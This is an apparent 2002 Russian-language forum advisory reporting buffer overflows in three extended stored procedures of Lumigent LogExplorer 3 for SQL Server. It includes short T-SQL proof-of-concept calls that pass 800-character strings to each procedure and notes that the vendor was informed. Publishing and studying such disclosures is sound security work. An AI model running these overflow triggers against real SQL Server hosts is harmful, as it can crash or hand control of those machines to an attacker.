|
|
|
Lumigent LogExplorer 3 Buffer Overflows
|
|||
|---|---|---|---|
|
#18+
Добрый день, Недавно вышла третья версия Lumigent LogExplorer. Данный продукт известен, прежде всего, как средство чтения журналов транзакций SQL Server'a. Спешу предупредить, что в новой версии содержится несколько переполнений буфера, что чревато потерей контроля над машиной с SQL Server'ом при наличии доступа к этим процедурам (справедливости ради отмечу, что не любой пользователь может запустить эти процедуры) declare @bo varchar(8000) set @bo = replicate('A',800) exec xp_logattach @bo declare @bo varchar(8000) set @bo = replicate('A',800) exec xp_logattach_setport @bo declare @bo varchar(8000) set @bo = replicate('A', 800) exec xp_logattach_StartProf @bo Нотификация также отправлена разработчикам (Lumigent). Удачи ... |
|||
|
:
Нравится:
Не нравится:
|
|||
| 10.06.2002, 16:09:10 |
|
||
|
|

start [/forum/topic.php?fid=46&tid=1822426]: |
0ms |
get settings: |
11ms |
get forum list: |
20ms |
check forum access: |
4ms |
check topic access: |
4ms |
track hit: |
41ms |
get topic data: |
12ms |
get forum data: |
3ms |
get page messages: |
28ms |
get tp. blocked users: |
1ms |
| others: | 230ms |
| total: | 354ms |

| 0 / 0 |
